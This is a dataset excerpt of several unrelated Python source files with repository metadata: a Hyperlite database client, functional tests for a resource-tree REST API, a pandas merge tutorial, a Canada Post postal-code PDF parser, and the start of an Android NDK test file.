repo_name
stringlengths 7
111
| __id__
int64 16.6k
19,705B
| blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 5
151
| content_id
stringlengths 40
40
| detected_licenses
list | license_type
stringclasses 2
values | repo_url
stringlengths 26
130
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
42
| visit_date
timestamp[ns] | revision_date
timestamp[ns] | committer_date
timestamp[ns] | github_id
int64 14.6k
687M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 12
values | gha_fork
bool 2
classes | gha_event_created_at
timestamp[ns] | gha_created_at
timestamp[ns] | gha_updated_at
timestamp[ns] | gha_pushed_at
timestamp[ns] | gha_size
int64 0
10.2M
⌀ | gha_stargazers_count
int32 0
178k
⌀ | gha_forks_count
int32 0
88.9k
⌀ | gha_open_issues_count
int32 0
2.72k
⌀ | gha_language
stringlengths 1
16
⌀ | gha_archived
bool 1
class | gha_disabled
bool 1
class | content
stringlengths 10
2.95M
| src_encoding
stringclasses 5
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 10
2.95M
| extension
stringclasses 19
values | num_repo_files
int64 1
202k
| filename
stringlengths 4
112
| num_lang_files
int64 1
202k
| alphanum_fraction
float64 0.26
0.89
| alpha_fraction
float64 0.2
0.89
| hex_fraction
float64 0
0.09
| num_lines
int32 1
93.6k
| avg_line_length
float64 4.57
103
| max_line_length
int64 7
931
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
d-Gaurav/hyperlite-client | 10,599,979,295,112 | 0562da47e326d8427b1117eed5524852f0b76f25 | 9c49f14a80181c6c3038e60b6058239af9d6d408 | /hyperlite/collection.py | 40bd4bf07d10217679e953c881830d608ebea33c | [
"MIT"
]
| permissive | https://github.com/d-Gaurav/hyperlite-client | 6ae1ee617079c12e517840b92f3682f5ad2619af | d181fdbf20d87016b8a3becffc97acd6d725f049 | refs/heads/master | 2021-10-22T13:41:11.334533 | 2019-03-11T07:06:24 | 2019-03-11T07:06:24 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import json
from .object import Object
from .cursor import Cursor
from .event import Event
from . import generateReadRequestSchema, generateReadByIdRequestSchema, generateReadOneRequestSchema, generateInsertRequestSchema, generateDeleteRequestSchema, generateUpdateRequestSchema, generateUpdateRequestSchema, generateInsertAllRequestSchema
from . import DATABASE
class Collection(object):
    """Client-side handle for a single Hyperlite collection.

    Every operation builds the matching request schema, stamps it with the
    target database/collection metadata and publishes it as a ``'request'``
    event on the shared ``Event`` bus; responses arrive asynchronously
    through the client transport.
    """

    def __init__(self, name: str):
        # Remote collection name used in every request's meta block.
        self.name = name
        # Populated by the transport layer with the latest result set.
        self.objects: Cursor

    def _emit(self, schema: dict) -> None:
        """Serialize *schema* to JSON and publish it on the event bus."""
        # NOTE: ``emmit`` spelling comes from the Event API; keep as-is.
        Event.emmit('request', json.dumps(schema))

    def insert(self, obj):
        """Insert a single object into this collection."""
        schema = generateInsertRequestSchema()
        schema["Insert"]["data"] = obj
        schema["Insert"]["meta"]["Database"] = DATABASE
        schema["Insert"]["meta"]["Collection"] = self.name
        self._emit(schema)

    def execHyperQl(self, query):
        """Run a HyperQL *query* against this collection."""
        schema = generateReadRequestSchema()
        schema["Read"]["meta"]["Query"] = query
        schema["Read"]["meta"]["Database"] = DATABASE
        schema["Read"]["meta"]["Collection"] = self.name
        self._emit(schema)

    def readAll(self):
        """Request every object (wildcard query)."""
        # Identical to execHyperQl with the "*" query; delegate instead of
        # repeating the schema assembly.
        self.execHyperQl("*")

    def readOne(self, query="*"):
        """Request the first object matching *query* (defaults to all)."""
        schema = generateReadOneRequestSchema()
        schema["ReadOne"]["meta"]["Query"] = query
        schema["ReadOne"]["meta"]["Database"] = DATABASE
        schema["ReadOne"]["meta"]["Collection"] = self.name
        self._emit(schema)

    def readById(self, objectId: str):
        """Request the single object with the given id."""
        schema = generateReadByIdRequestSchema()
        schema["ReadById"]["meta"]["Database"] = DATABASE
        schema["ReadById"]["meta"]["Collection"] = self.name
        schema["ReadById"]["meta"]["id"] = objectId
        self._emit(schema)

    def populate(self, obj: dict):
        """Emit a 'Pipeline' populate request built from *obj*.

        Raises:
            ValueError: if the required 'fieldRef' or 'to' key is missing.
        """
        if 'fieldRef' not in obj:
            # The original message said "'from' is required" although the
            # key actually checked is 'fieldRef'; report the real key.
            raise ValueError("'fieldRef' is required")
        if 'to' not in obj:
            raise ValueError("'to' is required")
        obj.update({'type': 'Pipeline', 'Database': DATABASE, 'Collection': self.name})
        self._emit(obj)

    def update(self, obj: dict, query="*"):
        """Update objects matching *query* with the fields in *obj*."""
        schema = generateUpdateRequestSchema()
        schema["Update"]["data"] = obj
        schema["Update"]["meta"]["Database"] = DATABASE
        schema["Update"]["meta"]["Collection"] = self.name
        schema["Update"]["meta"]["Query"] = query
        self._emit(schema)

    def delete(self, obj_id: str):
        """Delete the object with the given id."""
        schema = generateDeleteRequestSchema()
        schema["Delete"]["meta"]["Database"] = DATABASE
        schema["Delete"]["meta"]["Collection"] = self.name
        schema["Delete"]["meta"]["Object_Id"] = obj_id
        self._emit(schema)

    def insertAll(self, objects: list):
        """Insert many objects in one request.

        Raises:
            ValueError: if *objects* is not a non-empty list of dicts
                (the original validation also rejected an empty list).
        """
        if not (isinstance(objects, list) and objects
                and all(isinstance(item, dict) for item in objects)):
            raise ValueError("Invalid data for Insertion.")
        schema = generateInsertAllRequestSchema()
        schema["InsertAll"]["data"] = objects
        schema["InsertAll"]["meta"]["Database"] = DATABASE
        schema["InsertAll"]["meta"]["Collection"] = self.name
        self._emit(schema)
SiriusKoan/repair_system | 6,983,616,867,103 | fe2603e30d67fc7200ea64e9840fce8ab151ab38 | cf01c2b96d5f89ea6fa2ccb02ab5d8128c84e914 | /src/app/database/__init__.py | 771059365b71b1191c20b6fcc0e1f53e97d9c9f3 | [
"MIT"
]
from . import backup_helper, db_helper
from .common import cache
from .model import db

# __all__ must hold *names* (strings): a star-import raises
# "TypeError: Item in __all__ must be str" on non-string entries,
# which the previous list of module/objects would have triggered.
__all__ = ["db", "backup_helper", "db_helper", "cache"]
| UTF-8 | Python | false | false | 136 | py | 62 | __init__.py | 40 | 0.720588 | 0.720588 | 0 | 5 | 26.2 | 47 |
ergo/testscaffold | 11,974,368,829,247 | d1f7ef79875564f761df1ed1f342a262fb004cff | 5247672ce237e6da717bb37ed1223ee990b853ca | /backend/testscaffold/tests/functional/test_entries_api.py | 9f0a1387460326d2108aeee9f43a5cd4f78b3b41 | []
| no_license | https://github.com/ergo/testscaffold | df29ff27efa585411335388aa1a75dd4fc5d2220 | 4fb044ed57be955856eebcfe00874528b1efd03d | refs/heads/master | 2022-12-11T08:48:52.185780 | 2021-04-25T23:12:33 | 2021-04-25T23:12:33 | 62,617,583 | 9 | 4 | null | false | 2022-12-08T08:17:54 | 2016-07-05T08:02:54 | 2022-09-01T04:49:53 | 2022-12-08T08:17:54 | 369 | 7 | 3 | 9 | Python | false | false | import pprint
import pytest
from testscaffold.tests.utils import create_entry, session_context, create_admin
def create_default_tree(db_session):
    """Create the resource-tree fixture shared by the API tests.

    Layout (resource_id / resource_name, children indented)::

        -1 root a
            1 a
                5 aa, 6 ab, 7 ac (-> 9 aca -> 12 aca), 8 ad
            2 b (-> 4 ba)
            3 c, 10 d, 11 e
        -2 root b
        -3 root 3

    Returns:
        list: the three root resources ``[root a, root b, root 3]``.
    """
    # (resource_id, resource_name, ordering, parent resource_id or None).
    # Parents are listed before their children so the lookup below always
    # finds the already-created parent, mirroring the original call order.
    specs = [
        (-1, "root a", 1, None),
        (1, "a", 1, -1),
        (5, "aa", 1, 1),
        (6, "ab", 2, 1),
        (7, "ac", 3, 1),
        (9, "aca", 1, 7),
        (12, "aca", 1, 9),
        (8, "ad", 4, 1),
        (2, "b", 2, -1),
        (4, "ba", 1, 2),
        (3, "c", 3, -1),
        (10, "d", 4, -1),
        (11, "e", 5, -1),
        (-2, "root b", 2, None),
        (-3, "root 3", 3, None),
    ]
    created = {}
    for resource_id, name, ordering, parent_ref in specs:
        config = {
            "resource_id": resource_id,
            "resource_name": name,
            "ordering": ordering,
        }
        if parent_ref is not None:
            # Wire the parent via the created object's resource_id, exactly
            # as the original hand-written calls did.
            config["parent_id"] = created[parent_ref].resource_id
        created[resource_id] = create_entry(config, sqla_session=db_session)
    return [created[-1], created[-2], created[-3]]
@pytest.mark.usefixtures("full_app", "with_migrations", "clean_tables", "sqla_session")
class TestFunctionalAPIEntries:
    """Functional tests for the ``/api/0.1/entries`` REST endpoints.

    Each test drives the app through the ``full_app`` fixture using an
    ``x-testscaffold-auth-token`` header from a freshly created admin.
    Tree-shape tests build their fixture with ``create_default_tree``.
    """
    def test_wrong_token(self, full_app):
        """An invalid auth token is rejected with HTTP 403."""
        url_path = "/api/0.1/entries"
        headers = {str("x-testscaffold-auth-token"): str("test")}
        full_app.post(url_path, {}, status=403, headers=headers)
    def test_entries_list(self, full_app, sqla_session):
        """Listing paginates at 50 items and exposes the paging headers."""
        with session_context(sqla_session) as session:
            admin, token = create_admin(session)
            for x in range(1, 51):
                create_entry(
                    {"resource_name": "entry-x{}".format(x), "note": "x{}".format(x)}, sqla_session=session,
                )
                create_entry(
                    {"resource_name": "entry-y{}".format(x), "note": "y{}".format(x)}, sqla_session=session,
                )
        url_path = "/api/0.1/entries"
        headers = {str("x-testscaffold-auth-token"): str(token)}
        response = full_app.get(url_path, status=200, headers=headers)
        items = response.json
        # 100 entries exist; the first page carries 50 of them.
        assert len(items) == 50
        assert items[0]["resource_name"] == "entry-x1"
        assert items[49]["resource_name"] == "entry-y25"
        assert response.headers["x-pages"] == "2"
        assert response.headers["x-current-page"] == "1"
        assert response.headers["x-total-count"] == "100"
    def test_entry_create_no_json(self, full_app, sqla_session):
        """POST without a JSON body is a 422 validation error."""
        with session_context(sqla_session) as session:
            admin, token = create_admin(session)
        url_path = "/api/0.1/entries"
        headers = {str("x-testscaffold-auth-token"): str(token)}
        full_app.post_json(url_path, status=422, headers=headers)
    @pytest.mark.parametrize(
        "test_input, error_keys",
        [
            ({}, ["resource_name"]),
            ({"parent_id": "v"}, ["resource_name", "parent_id"]),
            ({"ordering": 5, "resource_name": "x"}, ["ordering"]),
            ({"parent_id": 5}, ["resource_name", "parent_id"]),
        ],
    )
    def test_entry_create_bad_json(self, full_app, sqla_session, test_input, error_keys):
        """Invalid payloads return 422 with one error key per bad field."""
        with session_context(sqla_session) as session:
            admin, token = create_admin(session)
        url_path = "/api/0.1/entries"
        headers = {str("x-testscaffold-auth-token"): str(token)}
        response = full_app.post_json(url_path, test_input, status=422, headers=headers)
        assert sorted(error_keys) == sorted(response.json.keys())
    def test_entry_create(self, full_app, sqla_session):
        """A valid payload creates the entry; the client-sent id is ignored."""
        with session_context(sqla_session) as session:
            admin, token = create_admin(session)
        url_path = "/api/0.1/entries"
        headers = {str("x-testscaffold-auth-token"): str(token)}
        entry_dict = {
            "id": -9999,
            "resource_name": "some-new-entry",
            "note": "text",
            "ordering": 1,
        }
        response = full_app.post_json(url_path, entry_dict, status=200, headers=headers)
        assert response.json["owner_user_id"] == admin.id
        # Server assigns its own (positive) id, discarding the -9999.
        assert response.json["resource_id"] > 0
        assert response.json["ordering"] == 1
        assert entry_dict["resource_name"] == response.json["resource_name"]
        assert entry_dict["note"] == response.json["note"]
    def test_entry_patch(self, full_app, sqla_session):
        """PATCH updates mutable fields; resource_id cannot be changed."""
        with session_context(sqla_session) as session:
            admin, token = create_admin(session)
            entry = create_entry({"resource_name": "entry-x", "note": "x"}, sqla_session=session)
        url_path = "/api/0.1/entries/{}".format(entry.resource_id)
        headers = {str("x-testscaffold-auth-token"): str(token)}
        entry_dict = {"resource_id": -9, "resource_name": "CHANGED", "note": "CHANGED"}
        response = full_app.patch_json(url_path, entry_dict, status=200, headers=headers)
        # The bogus resource_id in the payload is ignored.
        assert response.json["resource_id"] == entry.resource_id
        assert entry_dict["resource_name"] == response.json["resource_name"]
        assert entry_dict["note"] == response.json["note"]
    def test_entry_delete(self, full_app, sqla_session):
        """DELETE removes the node from the resource tree entirely."""
        from testscaffold.services.resource_tree_service import tree_service
        with session_context(sqla_session) as session:
            admin, token = create_admin(session)
            entry = create_entry({"resource_name": "entry-x", "note": "x"}, sqla_session=session)
        url_path = "/api/0.1/entries/{}".format(entry.resource_id)
        headers = {str("x-testscaffold-auth-token"): str(token)}
        full_app.delete_json(url_path, status=200, headers=headers)
        result = tree_service.from_parent_deeper(None, db_session=sqla_session)
        assert len(result.all()) == 0
    def test_entry_delete_branch(self, full_app, sqla_session):
        """Deleting node 1 removes its whole subtree and renumbers siblings."""
        from testscaffold.services.resource_tree_service import tree_service
        with session_context(sqla_session) as session:
            admin, token = create_admin(session)
            create_default_tree(db_session=sqla_session)
        url_path = "/api/0.1/entries/{}".format(1)
        headers = {str("x-testscaffold-auth-token"): str(token)}
        full_app.delete_json(url_path, status=200, headers=headers)
        result = tree_service.from_parent_deeper(None, db_session=sqla_session)
        row_ids = [r.Resource.resource_id for r in result]
        ordering = [r.Resource.ordering for r in result]
        # Subtree of 1 (5,6,7,8,9,12) is gone; 2,3,10,11 shift up one slot.
        assert row_ids == [-1, 2, 4, 3, 10, 11, -2, -3]
        assert ordering == [1, 1, 1, 2, 3, 4, 2, 3]
    def test_root_nesting(self, full_app, sqla_session):
        """The fixture tree nests children under the expected parents."""
        from testscaffold.services.resource_tree_service import tree_service
        root = create_default_tree(sqla_session)[0]
        result = tree_service.from_resource_deeper(root.resource_id, db_session=sqla_session)
        # ``children`` is keyed by resource_id; -1 is the "root a" node.
        tree_struct = tree_service.build_subtree_strut(result)["children"][-1]
        pprint.pprint(tree_struct)
        assert tree_struct["node"].resource_id == -1
        l1_nodes = [n for n in tree_struct["children"].values()]
        a_node = tree_struct["children"][1]
        b_node = tree_struct["children"][2]
        ac_node = a_node["children"][7]
        l_a_nodes = [n for n in a_node["children"].values()]
        l_b_nodes = [n for n in b_node["children"].values()]
        l_ac_nodes = [n for n in ac_node["children"].values()]
        assert [n["node"].resource_id for n in l1_nodes] == [1, 2, 3, 10, 11]
        assert [n["node"].resource_id for n in l_a_nodes] == [5, 6, 7, 8]
        assert [n["node"].resource_id for n in l_b_nodes] == [4]
        assert [n["node"].resource_id for n in l_ac_nodes] == [9]
    def test_root_entry_no_parent_no_order(self, full_app, sqla_session):
        """A root entry without ordering is appended after the existing roots."""
        with session_context(sqla_session) as session:
            admin, token = create_admin(session)
            create_default_tree(db_session=sqla_session)
        url_path = "/api/0.1/entries"
        headers = {str("x-testscaffold-auth-token"): str(token)}
        entry_dict = {"id": -9999, "resource_name": "some-new-entry", "note": "text"}
        response = full_app.post_json(url_path, entry_dict, status=200, headers=headers)
        from testscaffold.services.resource_tree_service import tree_service
        result = tree_service.from_parent_deeper(None, db_session=sqla_session, limit_depth=1)
        tree_struct = tree_service.build_subtree_strut(result)["children"]
        pprint.pprint(tree_struct)
        assert response.json["resource_id"] > 0
        assert response.json["ordering"] == 4
        new_id = response.json["resource_id"]
        assert [i for i in tree_struct.keys()] == [-1, -2, -3, new_id]
    def test_root_entry_no_parent_middle(self, full_app, sqla_session):
        """ordering=2 inserts the new root between the existing roots."""
        with session_context(sqla_session) as session:
            admin, token = create_admin(session)
            create_default_tree(db_session=sqla_session)
        url_path = "/api/0.1/entries"
        headers = {str("x-testscaffold-auth-token"): str(token)}
        entry_dict = {
            "id": -9999,
            "resource_name": "some-new-entry",
            "note": "text",
            "ordering": 2,
        }
        response = full_app.post_json(url_path, entry_dict, status=200, headers=headers)
        from testscaffold.services.resource_tree_service import tree_service
        result = tree_service.from_parent_deeper(None, db_session=sqla_session, limit_depth=1)
        tree_struct = tree_service.build_subtree_strut(result)["children"]
        pprint.pprint(tree_struct)
        assert response.json["resource_id"] > 0
        assert response.json["ordering"] == 2
        new_id = response.json["resource_id"]
        assert [i for i in tree_struct.keys()] == [-1, new_id, -2, -3]
    def test_root_entry_no_parent_last(self, full_app, sqla_session):
        """ordering=4 (one past the end) appends the new root last."""
        from testscaffold.services.resource_tree_service import tree_service
        with session_context(sqla_session) as session:
            admin, token = create_admin(session)
            create_default_tree(db_session=sqla_session)
        url_path = "/api/0.1/entries"
        headers = {str("x-testscaffold-auth-token"): str(token)}
        entry_dict = {
            "id": -9999,
            "resource_name": "some-new-entry",
            "note": "text",
            "ordering": 4,
        }
        response = full_app.post_json(url_path, entry_dict, status=200, headers=headers)
        result = tree_service.from_parent_deeper(None, db_session=sqla_session, limit_depth=1)
        tree_struct = tree_service.build_subtree_strut(result)["children"]
        assert response.json["resource_id"] > 0
        assert response.json["ordering"] == 4
        new_id = response.json["resource_id"]
        assert [i for i in tree_struct.keys()] == [-1, -2, -3, new_id]
    @pytest.mark.parametrize("ordering, expected", [(5, "4"), (0, "1"), (-1, "1")])
    def test_root_entry_no_parent_wrong_order(self, full_app, sqla_session, ordering, expected):
        """Out-of-range ordering values fail validation, naming the bound."""
        with session_context(sqla_session) as session:
            admin, token = create_admin(session)
            create_default_tree(db_session=sqla_session)
        url_path = "/api/0.1/entries"
        headers = {str("x-testscaffold-auth-token"): str(token)}
        entry_dict = {
            "id": -9999,
            "resource_name": "some-new-entry",
            "note": "text",
            "ordering": ordering,
        }
        response = full_app.post_json(url_path, entry_dict, status=422, headers=headers)
        print(response.text)
        assert expected in response.json["ordering"][0]
    def test_entry_create_parent_no_order(self, full_app, sqla_session):
        """A child without ordering is appended at the end of its branch."""
        from testscaffold.services.resource_tree_service import tree_service
        with session_context(sqla_session) as session:
            admin, token = create_admin(session)
            create_default_tree(db_session=sqla_session)
        url_path = "/api/0.1/entries"
        headers = {str("x-testscaffold-auth-token"): str(token)}
        entry_dict = {
            "id": -9999,
            "resource_name": "some-new-entry",
            "note": "text",
            "parent_id": 1,
        }
        response = full_app.post_json(url_path, entry_dict, status=200, headers=headers)
        result = tree_service.from_parent_deeper(1, db_session=sqla_session, limit_depth=1)
        tree_struct = tree_service.build_subtree_strut(result)["children"]
        pprint.pprint(tree_struct)
        assert response.json["resource_id"] > 0
        assert response.json["ordering"] == 5
        new_id = response.json["resource_id"]
        assert [i for i in tree_struct.keys()] == [5, 6, 7, 8, new_id]
    def test_entry_patch_same_parent(self, full_app, sqla_session):
        """Re-assigning a node to its current parent keeps its position."""
        from testscaffold.services.resource_tree_service import tree_service
        with session_context(sqla_session) as session:
            admin, token = create_admin(session)
            create_default_tree(db_session=sqla_session)
        url_path = "/api/0.1/entries/{}".format(1)
        headers = {str("x-testscaffold-auth-token"): str(token)}
        entry_dict = {"parent_id": -1}
        response = full_app.patch_json(url_path, entry_dict, status=200, headers=headers)
        result = tree_service.from_parent_deeper(None, db_session=sqla_session)
        tree_struct = tree_service.build_subtree_strut(result)["children"]
        pprint.pprint(tree_struct)
        assert response.json["ordering"] == 1
    def test_entry_patch_order_same_branch(self, full_app, sqla_session):
        """Changing only ordering reorders siblings within the same branch."""
        from testscaffold.services.resource_tree_service import tree_service
        with session_context(sqla_session) as session:
            admin, token = create_admin(session)
            create_default_tree(db_session=sqla_session)
        url_path = "/api/0.1/entries/{}".format(-2)
        headers = {str("x-testscaffold-auth-token"): str(token)}
        entry_dict = {"ordering": 3}
        response = full_app.patch_json(url_path, entry_dict, status=200, headers=headers)
        result = tree_service.from_parent_deeper(None, db_session=sqla_session)
        tree_struct = tree_service.build_subtree_strut(result)["children"]
        pprint.pprint(tree_struct)
        assert response.json["ordering"] == 3
        assert [i for i in tree_struct.keys()] == [-1, -3, -2]
        assert [i["node"].ordering for i in tree_struct.values()] == [1, 2, 3]
    @pytest.mark.parametrize(
        "node_id, position, ordered_elems",
        [(6, 3, [5, 7, 6, 8]), (6, 1, [6, 5, 7, 8]), (6, 2, [5, 6, 7, 8]), (6, 4, [5, 7, 8, 6]),],
    )
    def test_entry_patch_order_same_branch_nested(self, full_app, sqla_session, node_id, position, ordered_elems):
        """Moving node 6 to each slot of its branch yields the expected order."""
        from testscaffold.services.resource_tree_service import tree_service
        with session_context(sqla_session) as session:
            admin, token = create_admin(session)
            create_default_tree(db_session=sqla_session)
        url_path = "/api/0.1/entries/{}".format(node_id)
        headers = {str("x-testscaffold-auth-token"): str(token)}
        entry_dict = {"ordering": position}
        response = full_app.patch_json(url_path, entry_dict, status=200, headers=headers)
        result = tree_service.from_parent_deeper(1, db_session=sqla_session)
        tree_struct = tree_service.build_subtree_strut(result)["children"]
        pprint.pprint(tree_struct)
        assert response.json["ordering"] == position
        assert [i for i in tree_struct.keys()] == ordered_elems
        assert [i["node"].ordering for i in tree_struct.values()] == [1, 2, 3, 4]
    @pytest.mark.parametrize(
        "node_id, position, ordered_elems",
        [(12, 3, [5, 6, 12, 7, 8]), (12, 1, [12, 5, 6, 7, 8]), (12, 2, [5, 12, 6, 7, 8]), (12, 5, [5, 6, 7, 8, 12]),],
    )
    def test_entry_patch_order_upper_branch_nested(self, full_app, sqla_session, node_id, position, ordered_elems):
        """Re-parenting node 12 under 1 with an explicit position works."""
        from testscaffold.services.resource_tree_service import tree_service
        with session_context(sqla_session) as session:
            admin, token = create_admin(session)
            create_default_tree(db_session=sqla_session)
        url_path = "/api/0.1/entries/{}".format(node_id)
        headers = {str("x-testscaffold-auth-token"): str(token)}
        entry_dict = {"ordering": position, "parent_id": 1}
        response = full_app.patch_json(url_path, entry_dict, status=200, headers=headers)
        result = tree_service.from_parent_deeper(1, db_session=sqla_session)
        tree_struct = tree_service.build_subtree_strut(result)["children"]
        pprint.pprint(tree_struct)
        assert response.json["ordering"] == position
        assert [i for i in tree_struct.keys()] == ordered_elems
        assert [i["node"].ordering for i in tree_struct.values()] == [1, 2, 3, 4, 5]
    def test_entry_patch_order_upper_branch_no_order(self, full_app, sqla_session):
        """Re-parenting without ordering appends the node to the new branch."""
        from testscaffold.services.resource_tree_service import tree_service
        with session_context(sqla_session) as session:
            admin, token = create_admin(session)
            create_default_tree(db_session=sqla_session)
        url_path = "/api/0.1/entries/{}".format(12)
        headers = {str("x-testscaffold-auth-token"): str(token)}
        entry_dict = {"parent_id": 1}
        response = full_app.patch_json(url_path, entry_dict, status=200, headers=headers)
        result = tree_service.from_parent_deeper(1, db_session=sqla_session)
        tree_struct = tree_service.build_subtree_strut(result)["children"]
        pprint.pprint(tree_struct)
        assert response.json["ordering"] == 5
        assert [i for i in tree_struct.keys()] == [5, 6, 7, 8, 12]
        assert [i["node"].ordering for i in tree_struct.values()] == [1, 2, 3, 4, 5]
| UTF-8 | Python | false | false | 19,194 | py | 105 | test_entries_api.py | 66 | 0.606648 | 0.588569 | 0 | 403 | 46.627792 | 118 |
uiandwe/TIL | 18,674,517,807,160 | 171d3f0cbef5d104c876dd12a9a50988a58acd3f | ba80ca143ba35fd481730786a27ebdb1f88ce835 | /Machine_Running/10minutesToPandas/merge.py | 6a2f2fa512f84036e8dcda14737fe915ee04fab4 | []
| no_license | https://github.com/uiandwe/TIL | c541020b65adc53578aeb1c3ba4c6770b3b2e8b3 | 186544469374dd0279099c6c6aa7555ee23e42fe | refs/heads/master | 2022-02-15T08:33:07.270573 | 2022-01-01T15:22:54 | 2022-01-01T15:22:54 | 63,420,931 | 2 | 4 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python
# coding: utf-8
# In[1]:
import pandas as pd
# In[4]:
adf = pd.DataFrame({"x1": ["A", "B", "C"], "x2": [1, 2, 3]})
adf
# In[7]:
bdf = pd.DataFrame({"x1": ["A", "B", "D"], "x3": ["T", "F", "T"]})
bdf
# In[8]:
pd.merge(adf, bdf, how='left', on='x1')
# In[9]:
pd.merge(bdf, adf, how='left', on='x1')
# In[10]:
pd.merge(adf, bdf, how='right', on='x1')
# In[11]:
pd.merge(adf, bdf, how='inner', on='x1')
# In[12]:
pd.merge(adf, bdf, how='outer', on='x1')
# In[14]:
adf.x1.isin(bdf.x1)
# In[15]:
adf[adf.x1.isin(bdf.x1)]
# In[16]:
~adf.x1.isin(bdf.x1)
# In[17]:
adf[~adf.x1.isin(bdf.x1)]
# In[ ]:
| UTF-8 | Python | false | false | 666 | py | 1,288 | merge.py | 877 | 0.487988 | 0.427928 | 0 | 78 | 7.487179 | 66 |
rahulgoel97/CanadaFSAParser | 3,152,506,004,241 | 5e586005645c135283077916d16571a5b10d0d2b | 91245972275d1d93a0b792c723c0bcae3c77bcef | /canada_fsa_parser.py | 6a076fe33a8804a8360f10e9f6bbdae89c65969b | [
"MIT"
]
| permissive | https://github.com/rahulgoel97/CanadaFSAParser | c4aca77da07e34491b0c7526a537e291e90b4cb9 | 386a2eb1d563f210ecb3fb9c9149eedb64f52e2a | refs/heads/main | 2023-03-02T04:10:13.946324 | 2021-01-26T22:40:04 | 2021-01-26T22:40:04 | 333,233,771 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | '''
- Canadian FSA (Forward Sortation Area) parser
- Use Canada Post's listing to parse FSAs and Areas into a pandas dataframe and JSON format
- Example: https://www.canadapost.ca/assets/pdf/KB/nps/nps_nonlettermail_fsalist_jan2019.pdf (Jan 2019)
- Download the PDF on your computer, and use directory as input
'''
# Import dependencies
import PyPDF2
import re
import pandas as pd
import json
# Prompt for the path to the downloaded Canada Post FSA PDF
# (see the module docstring above for the source URL).
file_location=input("Please enter the directory: ")
# Parse the file
def parse_pages(pdfReader):
    """Parse every page of the Canada Post FSA PDF.

    Args:
        pdfReader: an open ``PyPDF2.PdfFileReader``.

    Returns:
        pandas.DataFrame: columns ``FSA`` (three-character code) and
        ``Area`` (the space-joined description tokens).
    """
    fsa_names = []
    fsa_areas = []
    for page_number in range(pdfReader.numPages):
        page_text = pdfReader.getPage(page_number).extractText()
        for record in parse_page(page_text):
            # record[0] is the FSA code; the remaining tokens form the
            # area description.
            fsa_names.append(record[0])
            fsa_areas.append(' '.join(record[1:]))
    # (The original also kept an unused running counter; dropped.)
    df = pd.DataFrame()
    df['FSA'] = fsa_names
    df['Area'] = fsa_areas
    return df
def parse_page(strings):
    """Parse one page of Canada Post's FSA listing.

    Args:
        strings: raw text extracted from a single PDF page.

    Returns:
        A list of token lists, one per FSA found; each inner list starts
        with the FSA code followed by its description tokens, e.g.
        ``['K1A', 'Ottawa', 'region']``.
    """
    # NOTE(review): the trailing ``$`` sits *inside* the character class,
    # so it matches a literal dollar sign rather than end-of-string.
    # Harmless for real FSA codes (letter-digit-letter) but presumably
    # unintended; kept to preserve the original matching behaviour.
    fsa_vals = re.findall(r'([A-Z][0-9][A-Z$])', strings)
    tokens = strings.split()
    # Indices in ``tokens`` where each detected FSA code appears.
    location_list = []
    for fsa in fsa_vals:
        for idx, token in enumerate(tokens):
            if token == fsa:
                location_list.append(idx)
    fsa_full_list = []
    for idx_value in range(len(location_list)):
        fsa_temp_list = []
        try:
            # Tokens between this FSA and the next one belong to it.
            for i in range(location_list[idx_value], location_list[idx_value + 1]):
                fsa_temp_list.append(tokens[i])
        except IndexError:
            # Last FSA on the page: it runs up to the "(+) ADDITION"
            # footer marker.  (Was a bare ``except:``; the only statement
            # that can raise in the try body is the out-of-range
            # ``location_list`` lookup, which raises IndexError.)
            last_index = 0
            for idx, token in enumerate(tokens):
                if token == '(+)' and tokens[idx + 1] == 'ADDITION':
                    last_index = idx
            for i in range(location_list[len(location_list) - 1], last_index):
                fsa_temp_list.append(tokens[i])
        fsa_full_list.append(fsa_temp_list)
    return fsa_full_list
def getFSAValues(file_location):
    """Parse the Canada Post FSA PDF at *file_location*.

    Returns:
        tuple: (pandas.DataFrame with ``FSA``/``Area`` columns, the same
        table as a dict decoded from its JSON representation).
    """
    # ``with`` closes the file handle — the original opened it and never
    # closed it.  All pages are consumed before the block exits.
    with open(file_location, 'rb') as pdfFileObj:
        pdfReader = PyPDF2.PdfFileReader(pdfFileObj)
        df = parse_pages(pdfReader)
    fsa_json = json.loads(df.to_json())
    return df, fsa_json
print("...Parsing the data")
try:
dfvals, jsonvals = getFSAValues(file_location)
print("...Success!")
while(True):
response = input("Do you want to save into Excel? (Y/n)")
if(response=='Y' or response=='y'):
dfvals.to_excel('FSA_Values.xlsx')
print("...Saved into Excel file")
break
elif(response=='N' or response=='n'):
break
else:
print("Please enter a valid response")
pass
while(True):
response = input("Do you want to save into JSON format? (Y/n)")
if(response=='Y' or response=='y'):
with open('FSA_vals.txt', 'w') as outfile:
json.dump(jsonvals, outfile)
print("...Saved into TXT file")
break
elif(response=='N' or response=='n'):
break
else:
print("Please enter a valid response")
pass
except:
print(f"Unknown error...")
| UTF-8 | Python | false | false | 5,328 | py | 3 | canada_fsa_parser.py | 1 | 0.560998 | 0.556494 | 0 | 189 | 26.169312 | 103 |
wimal-build/ndk | 9,234,179,727,855 | 76ffa8dd2cd0fc48a315702308b3bb721f2a0472 | 729e104ff6831343caf7e1afd8014232b35b8c26 | /tests/build/wrap_sh_none/test.py | c6ea862cd2124db575f42d813bd830bb213fd169 | [
"Apache-2.0"
]
| permissive | https://github.com/wimal-build/ndk | b8d77657b0e8b39f0da3fe2cc4f2aa52a00e5d7b | 82dbb8b7a26a1bb7a6fa8c2aa1ad7c431c1e626a | refs/heads/master | 2020-04-24T14:01:12.132020 | 2020-03-26T15:44:41 | 2020-03-26T15:44:41 | 172,006,630 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #
# Copyright (C) 2018 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
